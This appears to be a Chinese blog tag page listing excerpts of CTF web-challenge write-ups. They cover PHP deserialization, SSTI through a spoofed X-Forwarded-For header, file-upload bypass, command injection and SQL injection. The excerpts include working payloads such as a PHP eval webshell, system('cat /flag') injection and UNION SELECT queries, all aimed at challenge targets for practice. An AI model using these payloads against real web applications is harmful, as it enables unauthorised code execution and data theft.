标签:web

18 篇文章

[GWCTF 2019]枯燥的抽奖(7/100)
知识点 mt_srand生成的随机数实际是伪随机数,可以直接破解 php_mt_seed 解题 题目提示猜字符串,没有头绪 查看源码,可以看到有个check.php可以查看,直接访问 得到代码 <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); se…
[MRCTF2020]PYWebsite(3/100)
解题 进去是篇文章,让我购买flag,扫下扫到flag.php 提示保存了购买者的ip,尝试构造本地ip,直接获取flag
[MRCTF2020]Ezpop(2/100)
知识点 include,文件包含漏洞 魔法方法__invoke,尝试将对象调用为函数时触发 __toString,把类当作字符串使用时触发 __wakeup 使用反序列化函数时触发 __get 从不可访问的属性中读取数据会触发 解题 代码审计 Welcome to index.php <?php //flag is in flag.php /…
[BJDCTF2020]ZJCTF,不过如此
源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><…
[BJDCTF2020]The mystery of ip
提示IP 猜测用XFF,伪造XFF头看看情况 用X-Forwarded-For: {{7*7}}有回显 构造payload: X-Forwarded-For: {{system("ls")}} X-Forwarded-For: {{system("cat /flag")}}
Web
常见的几个HTTP IP头 x-forwarded-for x-remote-IP x-originating-IP x-remote-ip x-remote-addr x-client-ip x-client-IP Client-ip X-Real-ip SQL Injection SQL绕过 空格被过滤 %20 %09 %0a %0b %0c …
[极客大挑战 2019]Upload
知识点 常用后缀 php,php3,php4,php5,phtml,pht 常用一句话 GIF89a? <script language="php">eval($_POST['laotun'])</script> 文件类型绕过 Content-type: image/jpeg 解题 .phtml上传成功 蚂剑连接 获取fla…
[GXYCTF2019]Ping Ping Ping 1
解题 打开题目,显示/?ip= 应该是传参 直接尝试?ip=127.0.0.1 果然是linux命令执行,尝试其他命令 ?ip=127.0.0.1;ls 成功执行 目标是打开flag.php ?ip=127.0.0.1;cat flag.php ?ip=127.0.0.1;cat index.php 回显/?ip= fxck your space!…
serialize()序列化引起的魔术方法__wakeup()函数漏洞—攻防世界
知识点: 1、serialize()函数:用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。 2、unserialize()函数:用于将通过serialize()函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。 3、魔术方法:PHP 将所有以 __(两个下划线)开头的类…
sql注入-bugku
题目 成绩查询 题目链接 分析 可以知道这个题共4个数据 构建语句 'or 1=2 union select 1,2,3,4 # 查询表名 'or 1=2 union select group_concat(table_name),2,3,4 from information_schema.columns where table_schema=da…